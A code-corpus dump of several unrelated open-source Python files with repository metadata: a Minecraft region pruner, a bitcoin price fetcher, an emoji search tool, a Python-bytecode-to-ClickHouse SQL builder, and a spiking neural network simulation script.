] | null | null | null | mcRegionPrune.py | daniel-widrick/mcRegionPrune | 1848998394710dfc17d3cd4c66e0c90fff84858a | [
"MIT"
] | null | null | null | import sys, os, argparse
def pruneWorld(path, keepRadius):
chunkRadius = int(keepRadius / 512)  # each .mca region file covers 512x512 blocks (32x32 chunks)
chunkRadius += 1  # round up conservatively so border regions are kept
regionFileList = os.listdir(path)
for regionFile in regionFileList:
parts = regionFile.split(".")
if regionFile.endswith(".mca"):
if abs(int(parts[1])) > chunkRadius or abs(int(parts[2])) > chunkRadius:
print(regionFile)
parser = argparse.ArgumentParser(description="Prune region files outside a given block radius")
parser.add_argument("-p", "--path", required=True, help="Path to directory containing region files in world directory")
parser.add_argument("-b", "--blocks", required=True, type=int, help="Block radius around 0,0 to keep")
args = parser.parse_args()
pruneWorld(args.path, args.blocks)
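# Example invocation (hypothetical world path): print every .mca region file
# lying outside a 2000-block radius of 0,0 so it can be reviewed and deleted:
#   python mcRegionPrune.py --path world/region --blocks 2000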
| 35.454545 | 118 | 0.69359 | 98 | 780 | 5.489796 | 0.561224 | 0.022305 | 0.040892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012403 | 0.173077 | 780 | 21 | 119 | 37.142857 | 0.821705 | 0.015385 | 0 | 0 | 0 | 0 | 0.209909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.133333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c7225c61cfcb629018a0e6b7d11b69cf9edcdc | 462 | py | Python | bitcoin-api-helper/btc_price.py | programmer-o/bitcoin-researh-for-python | 6a8fa1520ea8e4fb0aba0c93a2e45fa6ca7de9f2 | [
"MIT"
] | 2 | 2022-01-03T16:19:48.000Z | 2022-01-03T16:20:22.000Z | bitcoin-api-helper/btc_price.py | programmer-o/bitcoin-researh-for-python | 6a8fa1520ea8e4fb0aba0c93a2e45fa6ca7de9f2 | [
"MIT"
] | null | null | null | bitcoin-api-helper/btc_price.py | programmer-o/bitcoin-researh-for-python | 6a8fa1520ea8e4fb0aba0c93a2e45fa6ca7de9f2 | [
"MIT"
] | null | null | null | import requests
def get_current_btc_price(currency_id):
try:
url = 'https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=%s'%currency_id
response = requests.get(url)
if response.status_code == 200:
data = response.content.decode('UTF-8')
print(data)
return data
else:
return {'msg': 'Something wrong'}
except Exception as e:
print(e)  # Exception objects have no .message attribute in Python 3
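# Example (requires network access; output shape follows CoinGecko's
# /simple/price endpoint):
#   get_current_btc_price('usd')   # prints e.g. '{"bitcoin":{"usd":43000}}'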
e8c738451bc403f27d4b67298bec3c0b1bd99e56 | 1,747 | py | Python | emoji.py | chenjiandongx/emoji.py | 8b0d9d6004a8191c73ca49b3211a7a04bb628321 | [
"MIT"
] | 7 | 2018-12-29T17:09:51.000Z | 2019-09-29T08:09:49.000Z | emoji.py | chenjiandongx/emoji.py | 8b0d9d6004a8191c73ca49b3211a7a04bb628321 | [
"MIT"
] | null | null | null | emoji.py | chenjiandongx/emoji.py | 8b0d9d6004a8191c73ca49b3211a7a04bb628321 | [
"MIT"
] | 1 | 2020-07-19T02:17:28.000Z | 2020-07-19T02:17:28.000Z | # coding=utf-8
import argparse
import json
import os
import pyperclip
from fuzzywuzzy import fuzz
from pick import pick
THRESHOLD = 80
VERSION = "0.1.0"
TITLE = "Emojis: Use arrow keys"
HERE = os.path.join(
os.path.abspath(os.path.dirname(__file__)), "emojilib")
with open(os.path.join(HERE, "emojis.json"), "r", encoding="utf-8") as f:
emojis = json.load(f)
def get_parser():
"""
解析命令行参数
"""
parser = argparse.ArgumentParser(description="Search emoji via command-line")
parser.add_argument(
"keyword", metavar="KEYWORD", type=str, nargs="*", help="emoji keyword"
)
parser.add_argument(
"-v",
"--version",
action="store_true",
help="displays the current version of emoji",
)
return parser
def command_line_runner():
"""
执行命令行操作
"""
parser = get_parser()
args = vars(parser.parse_args())
if args["version"]:
print("emoji", VERSION)
return
if len(args["keyword"]) == 0:
parser.print_help()
return
keyword = args["keyword"][0]
if not keyword:
parser.print_help()
return
query_emoji(keyword)
def query_emoji(keyword):
"""
查询 emoji 表情
"""
opts = list()
for key, value in emojis.items():
for v in value.get("keywords"):
if fuzz.ratio(v, keyword) > THRESHOLD:
opts.append(value.get("char"))
if len(opts) == 0:
print("Sorry, nothing found!")
return
opt, index = pick(opts, TITLE, indicator="=>")
pyperclip.copy(opt)
print("Copied", opt)
if __name__ == "__main__":
command_line_runner()
| 20.552941 | 82 | 0.564969 | 204 | 1,747 | 4.710784 | 0.47549 | 0.024974 | 0.020812 | 0.043704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008177 | 0.299943 | 1,747 | 84 | 83 | 20.797619 | 0.777596 | 0.023469 | 0 | 0.150943 | 0 | 0 | 0.153553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.113208 | 0 | 0.264151 | 0.09434 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c777be4500b793f6ba38c1d1130ee7f99e8613 | 21,570 | py | Python | ck/query/sql.py | hczhcz/PyCK | 6a635c0bd911bef413400ae348e38ea5e85c4e6b | [
"MIT"
] | 3 | 2020-03-19T10:10:20.000Z | 2020-12-26T10:53:37.000Z | ck/query/sql.py | hczhcz/PyCK | 6a635c0bd911bef413400ae348e38ea5e85c4e6b | [
"MIT"
] | null | null | null | ck/query/sql.py | hczhcz/PyCK | 6a635c0bd911bef413400ae348e38ea5e85c4e6b | [
"MIT"
] | 3 | 2020-11-05T02:42:38.000Z | 2021-03-24T06:39:41.000Z | import dis
import functools
import inspect
import types
import typing
from ck import exception
from ck.query import ast
def _run(
global_dict: typing.Dict[str, typing.Any],
local_dict: typing.Dict[str, typing.Any],
# TODO: use types.CellType
cells: typing.Tuple[typing.Any, ...],
stack: typing.List[typing.Any],
opname: str,
# TODO: int?
arg: typing.Any,
argval: typing.Any
) -> bool:
# TODO
# pylint: disable=trailing-comma-tuple
def call_named(
name: str,
*args: typing.Any
) -> ast.BaseAST:
return ast.Call(ast.Raw(name), *args)
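# Each branch below symbolically interprets one CPython bytecode instruction,
# building the equivalent ClickHouse expression AST instead of evaluating it
# (e.g. BINARY_ADD becomes plus(a, b)).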
if opname == 'NOP':
pass
elif opname == 'POP_TOP':
stack.pop()
elif opname == 'ROT_TWO':
stack[-2:] = stack[-1], stack[-2]
elif opname == 'ROT_THREE':
stack[-3:] = stack[-1], *stack[-3:-1]
elif opname == 'ROT_FOUR':
stack[-4:] = stack[-1], *stack[-4:-1]
elif opname == 'DUP_TOP':
stack.append(stack[-1])
elif opname == 'DUP_TOP_TWO':
stack.extend(stack[-2:])
elif opname == 'UNARY_POSITIVE':
stack[-1] = call_named('negate', call_named('negate', stack[-1]))
elif opname == 'UNARY_NEGATIVE':
stack[-1] = call_named('negate', stack[-1])
elif opname == 'UNARY_NOT':
stack[-1] = call_named('not', stack[-1])
elif opname == 'UNARY_INVERT':
stack[-1] = call_named('bitNot', stack[-1])
elif opname == 'GET_ITER':
stack[-1] = iter(stack[-1])
elif opname == 'GET_YIELD_FROM_ITER':
# TODO: more accurate semantic
stack[-1] = iter(stack[-1])
elif opname == 'BINARY_POWER':
stack[-2:] = call_named('pow', *stack[-2:]),
elif opname == 'BINARY_MULTIPLY':
stack[-2:] = call_named('multiply', *stack[-2:]),
elif opname == 'BINARY_MATRIX_MULTIPLY':
stack[-2:] = call_named('cast', *stack[-2:]),
elif opname == 'BINARY_FLOOR_DIVIDE':
stack[-2:] = call_named('intDiv', *stack[-2:]),
elif opname == 'BINARY_TRUE_DIVIDE':
stack[-2:] = call_named('divide', *stack[-2:]),
elif opname == 'BINARY_MODULO':
stack[-2:] = call_named('modulo', *stack[-2:]),
elif opname == 'BINARY_ADD':
stack[-2:] = call_named('plus', *stack[-2:]),
elif opname == 'BINARY_SUBTRACT':
stack[-2:] = call_named('minus', *stack[-2:]),
elif opname == 'BINARY_SUBSCR':
# TODO: subscr for slices?
# TODO: general element access for array, tuple, and string?
stack[-2:] = call_named('arrayElement', *stack[-2:]),
elif opname == 'BINARY_LSHIFT':
stack[-2:] = call_named('bitShiftLeft', *stack[-2:]),
elif opname == 'BINARY_RSHIFT':
stack[-2:] = call_named('bitShiftRight', *stack[-2:]),
elif opname == 'BINARY_AND':
stack[-2:] = call_named('bitAnd', *stack[-2:]),
elif opname == 'BINARY_XOR':
stack[-2:] = call_named('bitXor', *stack[-2:]),
elif opname == 'BINARY_OR':
stack[-2:] = call_named('bitOr', *stack[-2:]),
elif opname == 'INPLACE_POWER':
stack[-2:] = call_named('pow', *stack[-2:]),
elif opname == 'INPLACE_MULTIPLY':
stack[-2:] = call_named('multiply', *stack[-2:]),
elif opname == 'INPLACE_MATRIX_MULTIPLY':
stack[-2:] = call_named('cast', *stack[-2:]),
elif opname == 'INPLACE_FLOOR_DIVIDE':
stack[-2:] = call_named('intDiv', *stack[-2:]),
elif opname == 'INPLACE_TRUE_DIVIDE':
stack[-2:] = call_named('divide', *stack[-2:]),
elif opname == 'INPLACE_MODULO':
stack[-2:] = call_named('modulo', *stack[-2:]),
elif opname == 'INPLACE_ADD':
stack[-2:] = call_named('plus', *stack[-2:]),
elif opname == 'INPLACE_SUBTRACT':
stack[-2:] = call_named('minus', *stack[-2:]),
elif opname == 'INPLACE_LSHIFT':
stack[-2:] = call_named('bitShiftLeft', *stack[-2:]),
elif opname == 'INPLACE_RSHIFT':
stack[-2:] = call_named('bitShiftRight', *stack[-2:]),
elif opname == 'INPLACE_AND':
stack[-2:] = call_named('bitAnd', *stack[-2:]),
elif opname == 'INPLACE_XOR':
stack[-2:] = call_named('bitXor', *stack[-2:]),
elif opname == 'INPLACE_OR':
stack[-2:] = call_named('bitOr', *stack[-2:]),
elif opname == 'STORE_SUBSCR':
stack[-3:] = call_named(
'arrayConcat',
call_named(
'arraySlice',
stack[-2],
1,
call_named('minus', stack[-1], 1)
),
call_named('array', stack[-3]),
call_named(
'arraySlice',
stack[-2],
call_named('plus', stack[-1], 1)
)
),
elif opname == 'DELETE_SUBSCR':
stack[-2:] = call_named(
'arrayConcat',
call_named(
'arraySlice',
stack[-2],
1,
call_named('minus', stack[-1], 1)
),
call_named(
'arraySlice',
stack[-2],
call_named('plus', stack[-1], 1)
)
),
elif opname == 'GET_AWAITABLE':
raise exception.DisError(opname)
elif opname == 'GET_AITER':
raise exception.DisError(opname)
elif opname == 'GET_ANEXT':
raise exception.DisError(opname)
elif opname == 'END_ASYNC_FOR':
raise exception.DisError(opname)
elif opname == 'BEFORE_ASYNC_WITH':
raise exception.DisError(opname)
elif opname == 'SETUP_ASYNC_WITH':
raise exception.DisError(opname)
elif opname == 'PRINT_EXPR':
print(stack.pop())
elif opname == 'SET_ADD':
value = stack.pop()
stack[-arg].add(value)
elif opname == 'LIST_APPEND':
value = stack.pop()
stack[-arg].append(value)
elif opname == 'MAP_ADD':
name, value = stack[-2:]
del stack[-2:]
stack[-arg][name] = value
elif opname == 'RETURN_VALUE':
return True
elif opname == 'YIELD_VALUE':
raise exception.DisError(opname)
elif opname == 'YIELD_FROM':
raise exception.DisError(opname)
elif opname == 'SETUP_ANNOTATIONS':
if '__annotations__' not in local_dict:
local_dict['__annotations__'] = {}
elif opname == 'IMPORT_STAR':
module = stack.pop()
local_dict.update({
name: getattr(module, name)
for name in dir(module)
if not name.startswith('_')
})
elif opname == 'POP_BLOCK':
raise exception.DisError(opname)
elif opname == 'POP_EXCEPT':
raise exception.DisError(opname)
elif opname == 'POP_FINALLY':
raise exception.DisError(opname)
elif opname == 'BEGIN_FINALLY':
raise exception.DisError(opname)
elif opname == 'END_FINALLY':
raise exception.DisError(opname)
elif opname == 'LOAD_BUILD_CLASS':
stack.append(__build_class__) # type: ignore[name-defined]
elif opname == 'SETUP_WITH':
raise exception.DisError(opname)
elif opname == 'WITH_CLEANUP_START':
raise exception.DisError(opname)
elif opname == 'WITH_CLEANUP_FINISH':
raise exception.DisError(opname)
elif opname == 'STORE_NAME':
local_dict[argval] = stack.pop()
elif opname == 'DELETE_NAME':
del local_dict[argval]
elif opname == 'UNPACK_SEQUENCE':
if len(stack[-1]) != arg:
            raise ValueError('UNPACK_SEQUENCE length mismatch')
stack[-1:] = stack[-1][::-1]
elif opname == 'UNPACK_EX':
lo = arg % 256 # pylint: disable=invalid-name
hi = arg // 256 # pylint: disable=invalid-name
if hi:
stack[-1:] = *stack[-1][:lo], stack[-1][lo:-hi], *stack[-1][-hi:]
else:
stack[-1:] = *stack[-1][:lo], stack[-1][lo:]
elif opname == 'STORE_ATTR':
# TODO
raise exception.DisError(opname)
elif opname == 'DELETE_ATTR':
# TODO
raise exception.DisError(opname)
elif opname == 'STORE_GLOBAL':
global_dict[argval] = stack.pop()
elif opname == 'DELETE_GLOBAL':
del global_dict[argval]
elif opname == 'LOAD_CONST':
stack.append(argval)
elif opname == 'LOAD_NAME':
if argval in local_dict:
stack.append(local_dict[argval])
elif argval in global_dict:
stack.append(global_dict[argval])
else:
stack.append(ast.Identifier(argval))
elif opname == 'BUILD_TUPLE':
stack[len(stack) - arg:] = tuple(stack[len(stack) - arg:]),
elif opname == 'BUILD_LIST':
stack[len(stack) - arg:] = stack[len(stack) - arg:],
elif opname == 'BUILD_SET':
stack[len(stack) - arg:] = set(stack[len(stack) - arg:]),
elif opname == 'BUILD_MAP':
stack[len(stack) - 2 * arg:] = dict(
zip(
stack[len(stack) - 2 * arg::2],
stack[len(stack) - 2 * arg + 1::2]
)
),
elif opname == 'BUILD_CONST_KEY_MAP':
stack[-arg - 1:] = dict(zip(stack[-1], stack[-arg - 1:-1])),
elif opname == 'BUILD_STRING':
stack[len(stack) - arg:] = ''.join(stack[len(stack) - arg:]),
elif opname == 'BUILD_TUPLE_UNPACK':
stack[len(stack) - arg:] = tuple(
member
for value in stack[len(stack) - arg:]
for member in value
),
elif opname == 'BUILD_TUPLE_UNPACK_WITH_CALL':
stack[len(stack) - arg:] = tuple(
member
for value in stack[len(stack) - arg:]
for member in value
),
elif opname == 'BUILD_LIST_UNPACK':
stack[len(stack) - arg:] = [
member
for value in stack[len(stack) - arg:]
for member in value
],
elif opname == 'BUILD_SET_UNPACK':
stack[len(stack) - arg:] = {
member
for value in stack[len(stack) - arg:]
for member in value
},
elif opname == 'BUILD_MAP_UNPACK':
stack[len(stack) - arg:] = dict(
member
for value in stack[len(stack) - arg:]
for member in value.items()
),
elif opname == 'BUILD_MAP_UNPACK_WITH_CALL':
stack[len(stack) - arg:] = dict(
member
for value in stack[len(stack) - arg:]
for member in value.items()
),
elif opname == 'LOAD_ATTR':
if isinstance(stack[-1], ast.BaseStatement):
stack[-1] = ast.SimpleClause(stack[-1], argval)
else:
stack[-1] = call_named('tupleElement', stack[-1], argval)
elif opname == 'COMPARE_OP':
# notice: see dis.cmp_op
if argval == '<':
stack[-2:] = call_named('less', *stack[-2:]),
elif argval == '<=':
stack[-2:] = call_named('lessOrEquals', *stack[-2:]),
elif argval == '==':
stack[-2:] = call_named('equals', *stack[-2:]),
elif argval == '!=':
stack[-2:] = call_named('notEquals', *stack[-2:]),
elif argval == '>':
stack[-2:] = call_named('greater', *stack[-2:]),
elif argval == '>=':
stack[-2:] = call_named('greaterOrEquals', *stack[-2:]),
elif argval == 'in':
stack[-2:] = call_named('in', *stack[-2:]),
elif argval == 'not in':
stack[-2:] = call_named('notIn', *stack[-2:]),
elif argval == 'is':
stack[-2:] = call_named(
'and',
call_named(
'equals',
call_named('toTypeName', stack[-2]),
call_named('toTypeName', stack[-1])
),
call_named('equals', *stack[-2:])
),
elif argval == 'is not':
stack[-2:] = call_named(
'or',
call_named(
'notEquals',
call_named('toTypeName', stack[-2]),
call_named('toTypeName', stack[-1])
),
call_named('notEquals', *stack[-2:])
),
elif argval == 'exception match':
raise exception.DisError(opname)
elif argval == 'BAD':
raise exception.DisError(opname)
else:
raise exception.DisError(opname)
elif opname == 'IMPORT_NAME':
stack[-2:] = __import__(argval, fromlist=stack[-2], level=stack[-1]),
elif opname == 'IMPORT_FROM':
local_dict[argval] = getattr(stack[-1], argval)
elif opname == 'JUMP_FORWARD':
# TODO
raise exception.DisError(opname)
elif opname == 'POP_JUMP_IF_TRUE':
# TODO
raise exception.DisError(opname)
elif opname == 'POP_JUMP_IF_FALSE':
# TODO
raise exception.DisError(opname)
elif opname == 'JUMP_IF_TRUE_OR_POP':
# TODO
raise exception.DisError(opname)
elif opname == 'JUMP_IF_FALSE_OR_POP':
# TODO
raise exception.DisError(opname)
elif opname == 'JUMP_ABSOLUTE':
# TODO
raise exception.DisError(opname)
elif opname == 'FOR_ITER':
# TODO
raise exception.DisError(opname)
elif opname == 'LOAD_GLOBAL':
if argval in global_dict:
stack.append(global_dict[argval])
else:
stack.append(ast.Identifier(argval))
elif opname == 'SETUP_FINALLY':
raise exception.DisError(opname)
elif opname == 'CALL_FINALLY':
raise exception.DisError(opname)
elif opname == 'LOAD_FAST':
stack.append(local_dict[argval])
elif opname == 'STORE_FAST':
local_dict[argval] = stack.pop()
elif opname == 'DELETE_FAST':
del local_dict[argval]
elif opname == 'LOAD_CLOSURE':
stack.append(cells[arg])
elif opname == 'LOAD_DEREF':
stack.append(cells[arg].cell_contents)
elif opname == 'LOAD_CLASSDEREF':
stack.append(cells[arg].cell_contents)
elif opname == 'STORE_DEREF':
cells[arg].cell_contents = stack.pop()
elif opname == 'DELETE_DEREF':
del cells[arg].cell_contents
elif opname == 'RAISE_VARARGS':
raise exception.DisError(opname)
elif opname == 'CALL_FUNCTION':
if isinstance(stack[-arg - 1], ast.Identifier):
stack[-arg - 1:] = ast.Call(
stack[-arg - 1],
*stack[len(stack) - arg:]
),
elif isinstance(stack[-arg - 1], ast.Call):
stack[-arg - 1:] = ast.Call(
stack[-arg - 1],
*stack[len(stack) - arg:]
),
elif isinstance(stack[-arg - 1], ast.BaseStatement):
stack[-arg - 1:] = ast.ListClause(
stack[-arg - 1],
*stack[len(stack) - arg:]
),
else:
stack[-arg - 1:] = stack[-arg - 1](*stack[len(stack) - arg:]),
elif opname == 'CALL_FUNCTION_KW':
if isinstance(stack[-arg - 2], ast.Identifier):
if stack[-1]:
                raise TypeError('keyword arguments are not supported in SQL calls')
stack[-arg - 2:] = ast.Call(stack[-arg - 2], *stack[-arg - 1:-1]),
elif isinstance(stack[-arg - 2], ast.Call):
if stack[-1]:
                raise TypeError('keyword arguments are not supported in SQL calls')
stack[-arg - 2:] = ast.Call(stack[-arg - 2], *stack[-arg - 1:-1]),
elif isinstance(stack[-arg - 2], ast.BaseStatement):
stack[-arg - 2:] = ast.ListClause(
stack[-arg - 2],
*stack[-arg - 1:-len(stack[-1]) - 1],
**dict(zip(stack[-1], stack[-len(stack[-1]) - 1:-1]))
),
else:
stack[-arg - 2:] = stack[-arg - 2](
*stack[-arg - 1:-len(stack[-1]) - 1],
**dict(zip(stack[-1], stack[-len(stack[-1]) - 1:-1]))
),
elif opname == 'CALL_FUNCTION_EX':
if arg & 1:
kwargs = stack[-1]
stack.pop()
else:
kwargs = {}
if isinstance(stack[-2], ast.Identifier):
if kwargs:
                raise TypeError('keyword arguments are not supported in SQL calls')
stack[-2:] = ast.Call(stack[-2], *stack[-1]),
elif isinstance(stack[-2], ast.Call):
if kwargs:
                raise TypeError('keyword arguments are not supported in SQL calls')
stack[-2:] = ast.Call(stack[-2], *stack[-1]),
elif isinstance(stack[-2], ast.BaseStatement):
stack[-2:] = ast.ListClause(stack[-2], *stack[-1], **kwargs),
else:
stack[-2:] = stack[-2](*stack[-1], **kwargs),
elif opname == 'LOAD_METHOD':
if isinstance(stack[-1], ast.BaseStatement):
stack[-1:] = ast.SimpleClause(stack[-1], argval), stack[-1]
else:
stack[-1:] = getattr(stack[-1], argval).__func__, stack[-1]
elif opname == 'CALL_METHOD':
if isinstance(stack[-arg - 2], ast.BaseStatement):
stack[-arg - 2:] = ast.ListClause(
stack[-arg - 2],
*stack[len(stack) - arg:]
),
else:
stack[-arg - 2:] = stack[-arg - 2](*stack[-arg - 1:]),
elif opname == 'MAKE_FUNCTION':
# TODO
if arg & 8:
function = sql_template(
types.FunctionType(
stack[-2],
global_dict,
stack[-1],
closure=stack[-3]
)
)
del stack[-3:]
else:
function = sql_template(
types.FunctionType(stack[-2], global_dict, stack[-1])
)
del stack[-2:]
if arg & 4:
# notice: annotation is not used
stack.pop()
if arg & 2:
function.__kwdefaults__ = stack.pop()
if arg & 1:
function.__defaults__ = stack.pop()
stack.append(function)
elif opname == 'BUILD_SLICE':
        stack[len(stack) - arg:] = slice(*stack[len(stack) - arg:]),  # unpack the 2-3 slice components
elif opname == 'EXTENDED_ARG':
raise exception.DisError(opname)
elif opname == 'FORMAT_VALUE':
if arg & 4:
spec = stack[-1]
stack.pop()
else:
spec = ''
if arg & 3 == 0:
stack[-1] = format(stack[-1], spec)
elif arg & 3 == 1:
stack[-1] = format(str(stack[-1]), spec)
elif arg & 3 == 2:
stack[-1] = format(repr(stack[-1]), spec)
elif arg & 3 == 3:
stack[-1] = format(ascii(stack[-1]), spec)
elif opname == 'HAVE_ARGUMENT':
raise exception.DisError(opname)
else:
raise exception.DisError(opname)
return False
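# Illustrative trace (hypothetical operands): compiling a template that returns
# `a + b * 2` pushes Identifier('a'), Identifier('b') and 2; BINARY_MULTIPLY then
# folds the top two entries into Call(Raw('multiply'), b, 2), and BINARY_ADD
# leaves Call(Raw('plus'), a, ...), i.e. the SQL expression plus(a, multiply(b, 2)).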
def sql_template(
function: types.FunctionType
) -> types.FunctionType:
signature = inspect.signature(function)
instructions = list(dis.get_instructions(function))
@functools.wraps(function)
def build(
*args: typing.Any,
**kwargs: typing.Any
) -> typing.Any:
bound_arguments = signature.bind(*args, **kwargs)
bound_arguments.apply_defaults()
global_dict: typing.Dict[str, typing.Any] = {
# supported queries:
# with ... select ...
# select ...
# insert into ... select ...
# create table ... engine = ... as select ...
# create view ... as select ...
# create materialized view ... as select ...
'with_': ast.Initial('with'),
'select': ast.Initial('select'),
'select_distinct': ast.Initial('select_distinct'),
'insert': ast.Initial('insert'),
'insert_into': ast.Initial('insert_into'),
'create': ast.Initial('create'),
'create_table': ast.Initial('create_table'),
'create_table_if_not_exists':
ast.Initial('create_table_if_not_exists'),
'create_view': ast.Initial('create_view'),
'create_or_replace_view': ast.Initial('create_or_replace_view'),
'create_view_if_not_exists':
ast.Initial('create_view_if_not_exists'),
'create_materialized_view':
ast.Initial('create_materialized_view'),
'create_materialized_view_if_not_exists':
ast.Initial('create_materialized_view_if_not_exists'),
}
local_dict: typing.Dict[str, typing.Any] = {
**bound_arguments.arguments,
}
# TODO: use types.CellType in type annotation
cells: typing.Tuple[typing.Any, ...] = (
*(function.__closure__ or ()),
*(
types.CellType() # type: ignore[attr-defined]
for _ in function.__code__.co_cellvars or ()
),
)
stack: typing.List[typing.Any] = []
# notice: see dis.opmap
for instruction in instructions:
done = _run(
global_dict,
local_dict,
cells,
stack,
instruction.opname,
instruction.arg,
instruction.argval
)
if done:
assert len(stack) == 1
return stack.pop()
return None
# TODO
return typing.cast(types.FunctionType, build)
def sql_render(
function: types.FunctionType,
*args: typing.Any,
**kwargs: typing.Any
) -> str:
result = sql_template(function)(*args, **kwargs)
if isinstance(result, ast.BaseAST):
return result.render_statement()
return ast.Value(result).render_statement()
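# A minimal usage sketch -- the clause spellings are illustrative and depend on
# how ck.query.ast renders attribute accesses, so treat them as assumptions:
#     def my_query(min_age):
#         return select('name').where(age > min_age)
#     print(sql_render(my_query, 18))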
| 34.959481 | 78 | 0.522856 | 2,362 | 21,570 | 4.626164 | 0.108383 | 0.10982 | 0.038437 | 0.057655 | 0.647387 | 0.555779 | 0.501876 | 0.400018 | 0.322595 | 0.307038 | 0 | 0.01783 | 0.323968 | 21,570 | 616 | 79 | 35.016234 | 0.731518 | 0.032221 | 0 | 0.384335 | 0 | 0 | 0.11842 | 0.017705 | 0 | 0 | 0 | 0.001623 | 0.001821 | 1 | 0.009107 | false | 0.001821 | 0.020036 | 0.001821 | 0.043716 | 0.001821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c81ea4259f7269d85baaa020e21e5d8275cc7a | 6,229 | py | Python | neuronPopulation/testSpikeCount.py | pvili/SpikingTimeDependentPlasticity | dd0ed5eb5b54ce922035e119bc8299c75d9407ed | [
"MIT"
] | 6 | 2019-11-22T20:44:09.000Z | 2021-02-04T08:04:39.000Z | neuronPopulation/testSpikeCount.py | nikhil-garg/SpikingTimeDependentPlasticity | dd0ed5eb5b54ce922035e119bc8299c75d9407ed | [
"MIT"
] | null | null | null | neuronPopulation/testSpikeCount.py | nikhil-garg/SpikingTimeDependentPlasticity | dd0ed5eb5b54ce922035e119bc8299c75d9407ed | [
"MIT"
] | 2 | 2020-09-06T07:41:32.000Z | 2021-02-04T08:04:41.000Z | import spiking_neural_networks as snn
import data_processing as dp
import plotingFunctions as pF
import test_functions as tF
import numpy as np
from math import factorial
import time
import matplotlib.pyplot as plt
repetitions = 301  # 501
print('Running File: Test Spike Implosion')
neurons = 1000  # 5000
t_ref = 2.
time_intervals_count = [50, 100, 500, 1000, 5000, 10000, 50000]
sync_tau = 10
max_time = 100
sync_window = [0, 50]
def estimateSpikeCount(samples_first, samples_ISI, time_intervals = time_intervals_count, neurons = neurons):
time_interv = time_intervals[:]
time_max = max(time_interv)
spike_times = dp.probabilistic_spike_sampling_population(samples_first, samples_ISI, time_max, neurons)
spikesCount = []
count = 0
t = 0
next_time_limit = time_interv.pop(0)
while time_interv:
while t < next_time_limit:
t = spike_times.pop(0)
count = count + 1
spikesCount.append(count)
next_time_limit = time_interv.pop(0)
while t < next_time_limit:
t = spike_times.pop(0)
count = count + 1
spikesCount.append(count)
return spikesCount
def computeSynchronization(spikes, neurons, window_count = sync_tau, time_interval = [0, 100]):
(S_max, t_max) = dp.max_spikes_in_window(spikes, neurons, window_count)
if time_interval:
spikes_count = dp.count_spikes_in_time_window(spikes, time_interval)
spikeRate = float(spikes_count)/float(max(time_interval) - min(time_interval))
else:
time_length = (spikes[-1])[1] #use the time of the last spike as proxy
spikeRate = len(spikes)/time_length
averageSpikesPerTau = spikeRate*window_count
synch = float(S_max)/averageSpikesPerTau
return synch
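# Worked example of the normalisation above (hypothetical numbers): 200 spikes
# over a window of [0, 100] give a rate of 2 spikes per time unit, so tau = 10
# predicts 20 spikes per window on average; an observed S_max of 60 then yields
# synch = 60 / 20 = 3.0, i.e. three times the asynchronous expectation.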
def calculateSynchEvolution(sim_results, neurons, tau = sync_tau, rep = [0,-1]):
synch_list= []
for r in rep:
s = computeSynchronization(sim_results[r], neurons, tau)
synch_list.append(s)
return synch_list
def plot_synch_evolution(filename, neurons, tau, repetitions = range(0,300), label = []):
sim_results = dp.read_simulation_results(filename)
synch_list = calculateSynchEvolution(sim_results, neurons, tau, repetitions)
plt.plot(repetitions, synch_list, label=label)
def print_synch_evolution(filename, neurons, tau):
sim_results = dp.read_simulation_results(filename)
synch_list = calculateSynchEvolution(sim_results, neurons, tau)
print('Synchrony from ' + str(synch_list[0]) + ' to ' + str(synch_list[1]))
def spike_count_evolution(sim_results, time_intervals = time_intervals_count, neurons = 2000):
[init_first, init_ISI] = dp.extract_samples(sim_results[0], neurons)
[final_first, final_ISI] = dp.extract_samples(sim_results[-1], neurons)
spikes_count_init = estimateSpikeCount(init_first, init_ISI, time_intervals , neurons)
spikes_count_final = estimateSpikeCount(final_first, final_ISI, time_intervals , neurons)
print('Init Count: '+str(spikes_count_init))
print('Fin Count: '+str(spikes_count_final))
ratio = [round(float(fin - init)/init*100,1) for (init, fin) in zip(spikes_count_init, spikes_count_final)]
print('Ratio (%): '+ str(ratio))
return (spikes_count_init, spikes_count_final, ratio)
#
start = time.time()
print('Synch and Count Evolution')
rateVec = [0.1, 0.33, 1]
timeIntervalVec = [500, 200, 100, 50]
inputProbVec = [0.1, 0.33, 0.66, 1] #For simulations change to 0.9
table_initial_count = []
table_final_count = []
for rate_idx in range(len(rateVec)):
inputRate = rateVec[rate_idx]
timeInterval = timeIntervalVec[rate_idx]
snn.delay_SP_max = timeInterval
for inputProb in inputProbVec:
nameFile = 'simR'+str(inputRate)+'P'+str(inputProb)
print('Plot for Rate: '+str(inputRate)+' and Input Prob: '+str(inputProb) )
snn.delay_SP_max = timeInterval
SNN = snn.LIF_Network(neurons, int(inputRate*timeInterval))
SNN.initial_noise()
sim_results = tF.test(repetitions, SNN, inputProb)
dp.write_simulation_results(sim_results, nameFile)
# sim_results = dp.read_simulation_results(nameFile)
spikeCountEvolution = spike_count_evolution(sim_results, neurons = neurons)
table_initial_count.append(spikeCountEvolution[0])
table_final_count.append(spikeCountEvolution[1])
pF.savePlots = False
endMain = time.time()
print('Time main: ' + str(int(endMain-start)/60) + ' minutes')
start = endMain
